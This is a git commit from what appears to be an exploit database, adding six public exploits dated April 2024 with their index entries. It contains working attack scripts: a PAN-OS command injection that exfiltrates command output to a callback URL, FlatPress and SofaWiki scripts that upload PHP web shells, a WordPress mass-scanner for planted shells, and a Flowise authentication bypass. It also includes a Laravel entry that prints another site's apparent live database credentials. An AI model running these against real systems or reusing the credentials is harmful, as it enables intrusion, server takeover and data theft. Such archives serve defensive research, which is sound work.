DB: 2024-04-22

7 changes to exploits/shellcodes/ghdb Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation FlatPress v1.3 - Remote Command Execution Laravel Framework 11 - Credential Leakage SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated) Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution Flowise 1.6.5 - Authentication Bypass
2024-04-22 00:16:25 +00:00 · 2024-04-22 00:16:25 +00:00 · 9eb5c7b425
commit 9eb5c7b425
parent 4ab159b6a8
7 changed files with 463 additions and 0 deletions
--- a/exploits/linux_x86-64/remote/51996.txt
+++ b/exploits/linux_x86-64/remote/51996.txt
@ -0,0 +1,150 @@
+# Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation
+# Date: 21 Apr 2024
+# Exploit Author: Kr0ff
+# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400
+# Software Link: -
+# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3
+#          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1
+#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1
+# Tested on: Debian
+# CVE : CVE-2024-3400
+
+#!/usr/bin/env python3
+
+import sys
+
+try:
+    import argparse
+    import requests
+except ImportError:
+    print("Missing dependencies, either requests or argparse not installed")
+    sys.exit(2)
+
+# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
+# https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
+
+def check_vuln(target: str, file: str) -> bool:
+    ret = False
+
+    uri = "/ssl-vpn/hipreport.esp"
+
+    s = requests.Session()
+    r = ""
+
+    headers = {
+                "User-Agent" : \
+                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
+                "Content-Type": "application/x-www-form-urlencoded",
+                "Cookie": \
+                        f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
+    }
+
+    headers_noCookie = {
+                "User-Agent" : \
+                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
+    }
+
+    if not "http://" or not "https://" in target:
+        target = "http://" + target
+        try:
+            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
+        except requests.exceptions.Timeout or requests.ConnectionError as e:
+            print(f"Request timed out for \"HTTP\" !{e}")
+
+        print("Trying with \"HTTPS\"...")
+
+        target = "https://" + target
+        try:
+            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
+        except requests.exceptions.Timeout or requests.ConnectionError as e:
+            print(f"Request timed out for \"HTTPS\"")
+            sys.exit(1)
+    else:
+        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
+
+    if r.status_code == 200:
+        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )
+        if r.status_code == 403:
+            print("Target vulnerable to CVE-2024-3400")
+            ret = True
+    else:
+        return ret
+
+    return ret
+
+
+
+def cmdexec(target: str, callback_url: str, payload: str) -> bool:
+    ret = False
+    p = ""
+
+    if " " in payload:
+        p = payload.replace(" ", "${IFS)")
+
+    uri = "/ssl-vpn/hipreport.esp"
+
+    headers = {
+                "User-Agent" : \
+                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
+                "Content-Type": "application/x-www-form-urlencoded",
+                "Cookie": \
+                        f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"
+
+            }
+
+    s = requests.Session()
+    r = ""
+
+    if not "http://" or not "https://" in target:
+        target = "http://" + target
+        try:
+            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
+        except requests.exceptions.Timeout or requests.ConnectionError as e:
+            print(f"Request timed out for \"HTTP\" !{e}")
+
+        print("Trying with \"HTTPS\"...")
+
+        target = "https://" + target
+        try:
+            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
+        except requests.exceptions.Timeout or requests.ConnectionError as e:
+            print(f"Request timed out for \"HTTPS\"")
+            sys.exit(1)
+    else:
+        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
+
+    if not "Success" in r.text:
+        return ret
+
+    else:
+        ret = True
+
+    return ret
+
+#Initilize parser for arguments
+def argparser(selection=None):
+    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )
+
+    subparser = parser.add_subparsers( help="Available modules", dest="module")
+
+    exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")
+    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )
+    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )
+    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )
+    #---------------------------------------
+    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )
+    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )
+    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )
+
+    args = parser.parse_args(selection)
+    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])
+
+    if args.module == "exploit":
+        cmdexec(args.target, args.callbackurl, args.payload)
+
+    if args.module == "check":
+        check_vuln(args.target, args.filename)
+
+if __name__ == "__main__":
+    argparser()
+    print("Finished !")
--- a/exploits/php/webapps/51997.txt
+++ b/exploits/php/webapps/51997.txt
@ -0,0 +1,78 @@
+# Exploit Title: FlatPress v1.3 - Remote Command Execution
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 19.04.2024
+# Vendor Homepage: https://www.flatpress.org
+# Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
+# Tested Version: 1.3 (latest)
+# Tested on: MacOS
+
+import requests
+import time
+import random
+import string
+
+def random_string(length=5):
+    """Rastgele bir string oluşturur."""
+    letters = string.ascii_lowercase
+    return ''.join(random.choice(letters) for i in range(length))
+
+def login_and_upload(base_url, username, password):
+    filename = random_string() + ".php"
+    login_url = f"http://{base_url}/login.php"
+    upload_url = f"http://{base_url}/admin.php?p=uploader&action=default"
+
+    with requests.Session() as session:
+        # Exploiting
+        print("Exploiting...")
+        time.sleep(1)
+
+        # Giriş yapma denemesi
+        login_data = {
+        'user': username,
+        'pass': password,
+        'submit': 'Login'
+        }
+        print("Logging in...")
+        response = session.post(login_url, data=login_data)
+        time.sleep(1)
+
+        if "Logout" in response.text:
+            print("Login Successful!")
+        else:
+            print("Login Failed!")
+            print(response.text)
+            return
+
+        # Dosya yükleme denemesi
+        print("Shell uploading...")
+        time.sleep(1)
+
+        # Form verileri ve dosyalar
+        files = {
+        'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),
+        }
+        form_data = {
+        '_wpnonce': '9e0ed04260',
+        '_wp_http_referer': '/admin.php?p=uploader',
+        'upload': 'Upload'
+        }
+
+        response = session.post(upload_url, files=files, data=form_data)
+
+        if "File(s) uploaded" in response.text or "Upload" in response.text:
+            shell_url = f"http://{base_url}/fp-content/attachs/{filename}"
+            print(f"Your Shell is Ready: {shell_url}")
+            time.sleep(1)
+            print(f"Shell Usage: {shell_url}?0=command")
+        else:
+            print("Exploit Failed!")
+            print(response.status_code, response.text)
+
+# Örnek kullanım: python script.py siteadi.com username password
+if __name__ == "__main__":
+    import sys
+    if len(sys.argv) != 4:
+        print("Usage: script.py <base_url> <username> <password>")
+    else:
+        base_url, username, password = sys.argv[1:]
+        login_and_upload(base_url, username, password)
--- a/exploits/php/webapps/51998.txt
+++ b/exploits/php/webapps/51998.txt
@ -0,0 +1,88 @@
+# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
+# Date: 2024-04-16
+# Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com
+# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# Vendor Homepage: https://wordpress.org
+# Software Link: https://wordpress.org/plugins/background-image-cropper/
+# Version: 1.2
+# Category : webapps
+# Tested on: windows 10 , firefox
+
+import sys , requests, re
+from multiprocessing.dummy import Pool
+from colorama import Fore
+from colorama import init
+init(autoreset=True)
+shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
+"<form method='post' enctype='multipart/form-data'> <input type='file'
+name='zb'><input type='submit' name='upload' value='upload'></form>";
+if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
+$_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
+Upload."; } } ?>"""
+requests.urllib3.disable_warnings()
+headers = {'Connection': 'keep-alive',
+            'Cache-Control': 'max-age=0',
+            'Upgrade-Insecure-Requests': '1',
+            'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A
+Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
+Chrome/60.0.3112.107 Moblie Safari/537.36',
+            'Accept':
+'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
+            'Accept-Encoding': 'gzip, deflate',
+            'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
+            'referer': 'www.google.com'}
+try:
+    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
+except IndexError:
+    path = str(sys.argv[0]).split('\\')
+    exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
+
+def URLdomain(site):
+    if site.startswith("http://") :
+        site = site.replace("http://","")
+    elif site.startswith("https://") :
+        site = site.replace("https://","")
+    else :
+        pass
+    pattern = re.compile('(.*)/')
+    while re.findall(pattern,site):
+        sitez = re.findall(pattern,site)
+        site = sitez[0]
+    return site
+
+
+def FourHundredThree(url):
+    try:
+        url = 'http://' + URLdomain(url)
+        check =
+requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
+allow_redirects=True,timeout=15)
+        if 'enctype="multipart/form-data" name="uploader"
+id="uploader"><input type="file" name="file" size="50"><input name="_upl"
+type="submit" id="_upl" value="Upload' in check.content:
+                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
+                open('Shells.txt', 'a').write(url +
+'/wp-content/plugins/background-image-cropper/ups.php\n')
+        else:
+            url = 'https://' + URLdomain(url)
+            check =
+requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
+allow_redirects=True,verify=False ,timeout=15)
+            if 'enctype="multipart/form-data" name="uploader"
+id="uploader"><input type="file" name="file" size="50"><input name="_upl"
+type="submit" id="_upl" value="Upload' in check.content:
+                    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
+                    open('Shells.txt', 'a').write(url +
+'/wp-content/plugins/background-image-cropper/ups.php\n')
+            else:
+                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
+    except :
+        print ' -| ' + url + ' --> {}[Failed]'.format(fr)
+
+mp = Pool(150)
+mp.map(FourHundredThree, target)
+mp.close()
+mp.join()
+
+print '\n [!] {}Saved in LOL.txt'.format(fc)
--- a/exploits/php/webapps/51999.py
+++ b/exploits/php/webapps/51999.py
@ -0,0 +1,82 @@
+# Exploit Title: SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated)
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 18.04.2024
+# Vendor Homepage: https://www.sofawiki.com
+# Software Link: https://www.sofawiki.com/site/files/snapshot.zip
+# Tested Version: v3.9.2 (latest)
+# Tested on: MacOS
+
+
+import requests
+import random
+import sys
+import time
+
+def main():
+if len(sys.argv) < 4:
+print("Usage: python exploit.py <base_url> <username> <password>")
+sys.exit(1)
+
+base_url, username, password = sys.argv[1:4]
+
+
+filename = f"{random.randint(10000, 99999)}.phtml"
+
+
+session = requests.Session()
+
+
+login_url = f"{base_url}/index.php"
+login_data = {
+"submitlogin": "Login",
+"username": username,
+"pass": password,
+"name": "SofaWiki",
+"action": "login"
+}
+print("Exploiting...")
+time.sleep(1)
+response = session.post(login_url, data=login_data)
+if "Logout" not in response.text:
+print("Login failed:", response.text)
+sys.exit()
+
+print("Login Successful")
+time.sleep(1)
+php_shell_code = """
+<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+if(isset($_GET['cmd']))
+{
+system($_GET['cmd']);
+}
+?>
+</pre>
+</body>
+</html>
+"""
+
+print("Shell uploading...")
+time.sleep(1)
+upload_url = f"{base_url}/index.php"
+files = {
+"uploadedfile": (filename, php_shell_code, "text/php"),
+"action": (None, "uploadfile"),
+"MAX_FILE_SIZE": (None, "8000000"),
+"filename": (None, filename),
+"content": (None, "content")
+}
+response = session.post(upload_url, files=files)
+if response.status_code == 200:
+print(f"Your shell is ready: {base_url}/site/files/{filename}")
+else:
+print("Upload failed:", response.text)
+
+if __name__ == "__main__":
+main()
--- a/exploits/php/webapps/52000.txt
+++ b/exploits/php/webapps/52000.txt
@ -0,0 +1,29 @@
+# Exploit Title: Laravel Framework 11 - Credential Leakage
+# Google Dork: N/A
+# Date: [2024-04-19]
+# Exploit Author: Huseein Amer
+# Vendor Homepage: [https://laravel.com/]
+# Software Link: N/A
+# Version: 8.* - 11.* (REQUIRED)
+# Tested on: [N/A]
+# CVE : CVE-2024-29291
+
+Proof of concept:
+Go to any Laravel-based website and navigate to storage/logs/laravel.log.
+
+Open the file and search for "PDO->__construct('mysql:host=".
+The result:
+shell
+Copy code
+#0
+/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):
+PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',
+Array)
+#1
+/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):
+Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',
+'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
+Credentials:
+Username: u429384055_jscv
+Password: Jaly$$a0p0p0p0
+Host: sql1...
--- a/exploits/typescript/webapps/52001.txt
+++ b/exploits/typescript/webapps/52001.txt
@ -0,0 +1,30 @@
+# Exploit Title: Flowise 1.6.5 - Authentication Bypass
+# Date: 17-April-2024
+# Exploit Author: Maerifat Majeed
+# Vendor Homepage: https://flowiseai.com/
+# Software Link: https://github.com/FlowiseAI/Flowise/releases
+# Version: 1.6.5
+# Tested on: mac-os
+# CVE : CVE-2024-31621
+
+The flowise version <= 1.6.5 is vulnerable to authentication bypass
+vulnerability.
+The code snippet
+
+this.app.use((req, res, next) => {
+>                 if (req.url.includes('/api/v1/')) {
+>                     whitelistURLs.some((url) => req.url.includes(url)) ?
+> next() : basicAuthMiddleware(req, res, next)
+>                 } else next()
+>             })
+
+
+puts authentication middleware for all the endpoints with path /api/v1
+except a few whitelisted endpoints. But the code does check for the case
+sensitivity hence only checks for lowercase /api/v1 . Anyone modifying the
+endpoints to uppercase like /API/V1 can bypass the authentication.
+
+*POC:*
+curl http://localhost:3000/Api/v1/credentials
+For seamless authentication bypass. Use burpsuite feature Match and replace
+rules in proxy settings. Add rule Request first line api/v1 ==> API/V1
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -9156,6 +9156,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32751,exploits/linux_x86-64/local/32751.c,"Systrace 1.x (Linux Kernel x64) - Aware Local Privilege Escalation",2009-01-23,"Chris Evans",local,linux_x86-64,,2009-01-23,2018-12-12,1,CVE-2009-0343;OSVDB-53535,,,,,https://www.securityfocus.com/bid/33417/info
 32277,exploits/linux_x86-64/remote/32277.txt,"Nginx 1.4.0 (Generic Linux x64) - Remote Overflow",2014-03-15,sorbo,remote,linux_x86-64,,2014-03-20,2017-11-22,0,CVE-2013-2028,,,,http://www.exploit-db.comnginx-1.4.0.tar.gz,
 45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,,2018-07-10,2018-07-10,0,,,,,,http://seclists.org/fulldisclosure/2014/Oct/35
+51996,exploits/linux_x86-64/remote/51996.txt,"Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation",2024-04-21,Kr0ff,remote,linux_x86-64,,2024-04-21,2024-04-21,0,CVE-2024-3400,,,,,
 42964,exploits/linux_x86-64/remote/42964.rb,"Rancher Server - Docker Daemon Code Execution (Metasploit)",2017-10-09,Metasploit,remote,linux_x86-64,8080,2017-10-09,2017-10-09,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/7a87e1176762099088edc33db99fbfc7066e758e/modules/exploits/linux/http/rancher_server.rb
 44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,,2018-07-03,2018-07-03,0,CVE-2018-12520,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
 48676,exploits/lua/webapps/48676.txt,"Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)",2020-07-16,V1n1v131r4,webapps,lua,,2020-07-16,2020-07-16,0,,,,,,
@ -18625,6 +18626,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 29515,exploits/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,webapps,php,80,2013-11-08,2013-11-08,0,OSVDB-99544,,,,http://www.exploit-db.comflatpress-1.0-solenne.tar.bz2,
 39870,exploits/php/webapps/39870.html,"Flatpress 1.0.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-05-31,LiquidWorm,webapps,php,80,2016-05-31,2016-05-31,0,,,,,http://www.exploit-db.comflatpress-1.0.3.tar.gz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5328.php
 48826,exploits/php/webapps/48826.txt,"Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting",2020-09-22,"Alperen Ergel",webapps,php,,2020-09-22,2021-01-05,0,CVE-2020-35241,,,,,
+51997,exploits/php/webapps/51997.txt,"FlatPress v1.3 - Remote Command Execution",2024-04-21,"Ahmet Ümit BAYRAM",webapps,php,,2024-04-21,2024-04-21,0,,,,,,
 7862,exploits/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,webapps,php,,2009-01-24,2017-01-23,1,OSVDB-51560;CVE-2009-0284,,,,,
 7884,exploits/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,webapps,php,,2009-01-26,,1,,,,,,
 7474,exploits/php/webapps/7474.txt,"FLDS 1.2a - 'lpro.php' SQL Injection",2008-12-15,nuclear,webapps,php,,2008-12-14,2017-01-05,1,OSVDB-50723;CVE-2008-5779,,,,,
@ -22477,6 +22479,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34824,exploits/php/webapps/34824.txt,"Lantern CMS - '11-login.asp' Cross-Site Scripting",2010-10-08,"High-Tech Bridge SA",webapps,php,,2010-10-08,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43865/info
 49424,exploits/php/webapps/49424.py,"Laravel 8.4.2 debug mode - Remote code execution",2021-01-14,"SunCSR Team",webapps,php,,2021-01-14,2021-04-07,0,CVE-2021-3129,,,,,
 49112,exploits/php/webapps/49112.py,"Laravel Administrator 4 - Unrestricted File Upload (Authenticated)",2020-11-27,"Xavi Beltran",webapps,php,,2020-11-27,2020-11-27,0,CVE-2020-10963,,,,,
+52000,exploits/php/webapps/52000.txt,"Laravel Framework 11 - Credential Leakage",2024-04-21,"Huseein Amer",webapps,php,,2024-04-21,2024-04-21,0,CVE-2024-29291,,,,,
 44343,exploits/php/webapps/44343.py,"Laravel Log Viewer < 0.13.0 - Local File Download",2018-03-26,"Haboob Team",webapps,php,,2018-03-26,2018-03-26,0,CVE-2018-8947,,,,,
 49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php,,2020-12-04,2020-12-04,0,,,,,,
 5886,exploits/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,,1,,,,,,
@ -30081,6 +30084,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2336,exploits/php/webapps/2336.pl,"Socketwiz BookMarks 2.0 - 'root_dir' Remote File Inclusion",2006-09-09,Kacper,webapps,php,,2006-09-08,,1,OSVDB-28742;CVE-2006-7069,,,,,
 18868,exploits/php/webapps/18868.txt,"Sockso 1.51 - Persistent Cross-Site Scripting",2012-05-12,"Ciaran McNally",webapps,php,,2012-05-12,2012-05-13,1,OSVDB-81873;CVE-2012-4267,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-13-at-103706-am.png,http://www.exploit-db.comsockso-1.5.1.zip,
 18798,exploits/php/webapps/18798.txt,"Soco CMS - Local File Inclusion",2012-04-29,"BHG Security Center",webapps,php,,2012-04-30,2012-04-30,1,OSVDB-81797,,,,,
+51999,exploits/php/webapps/51999.py,"SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated)",2024-04-21,"Ahmet Ümit BAYRAM",webapps,php,,2024-04-21,2024-04-21,0,,,,,,
 6539,exploits/php/webapps/6539.txt,"Sofi WebGui 0.6.3 PRE - 'mod_dir' Remote File Inclusion",2008-09-23,dun,webapps,php,,2008-09-22,2016-12-22,1,OSVDB-52401;CVE-2008-6402,,,,,
 11189,exploits/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,indoushka,webapps,php,,2010-01-17,,1,,,,,,
 26158,exploits/php/webapps/26158.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' HTML Injection",2005-08-16,"John Cobb",webapps,php,,2005-08-16,2013-06-13,1,,,,,,https://www.securityfocus.com/bid/14579/info
@ -32945,6 +32949,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49399,exploits/php/webapps/49399.rb,"WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php,,2021-01-08,2021-01-08,1,,,,,,
 45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php,80,2018-12-11,2018-12-12,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comwp-autosuggest.0.24.zip,
 37275,exploits/php/webapps/37275.txt,"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload",2015-06-12,"Larry W. Cashdollar",webapps,php,80,2015-06-12,2015-06-12,0,CVE-2015-4455;OSVDB-123125,,,,,http://www.vapid.dhs.org/advisory.php?v=125
+51998,exploits/php/webapps/51998.txt,"Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution",2024-04-21,"Milad karimi",webapps,php,,2024-04-21,2024-04-21,0,,,,,,
 44417,exploits/php/webapps/44417.txt,"WordPress Plugin Background Takeover < 4.1.4 - Directory Traversal",2018-04-09,"Colette Chamberland",webapps,php,,2018-04-09,2018-07-27,0,CVE-2018-9118,,,,,
 19524,exploits/php/webapps/19524.txt,"WordPress Plugin Backup 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",webapps,php,,2012-07-02,2012-07-04,1,OSVDB-83701,"WordPress Plugin",,http://www.exploit-db.com/screenshots/idlt20000/backup.png,http://www.exploit-db.combackup.2.0.1.zip,
 50503,exploits/php/webapps/50503.txt,"WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion",2021-11-08,"Murat DEMİRCİ",webapps,php,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.combackup-and-restore-for-wp.1.0.3.zip,
@ -35241,6 +35246,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4032,exploits/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,remote,tru64,,2007-06-03,,1,OSVDB-36204;CVE-2007-2791,,,,,
 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,,2021-06-15,2021-06-15,0,,,,,,
 51354,exploits/typescript/webapps/51354.txt,"ever gauzy v0.281.9 - JWT weak HMAC secret",2023-04-10,nu11secur1ty,webapps,typescript,,2023-04-10,2023-04-10,0,,,,,,
+52001,exploits/typescript/webapps/52001.txt,"Flowise 1.6.5 - Authentication Bypass",2024-04-21,"Maerifat Majeed",webapps,typescript,,2024-04-21,2024-04-21,0,CVE-2024-31621,,,,,
 51385,exploits/typescript/webapps/51385.txt,"FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)",2023-04-20,"Rodolfo Mariano",webapps,typescript,,2023-04-20,2023-04-20,0,,,,,,
 51073,exploits/typescript/webapps/51073.txt,"Grafana <=6.2.4 - HTML Injection",2023-03-27,"SimranJeet Singh",webapps,typescript,,2023-03-27,2023-06-09,1,CVE-2019-13068,,,,,
 19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",dos,ultrix,,2000-03-16,2012-07-14,1,OSVDB-83869,,,,,https://www.securityfocus.com/bid/1071/info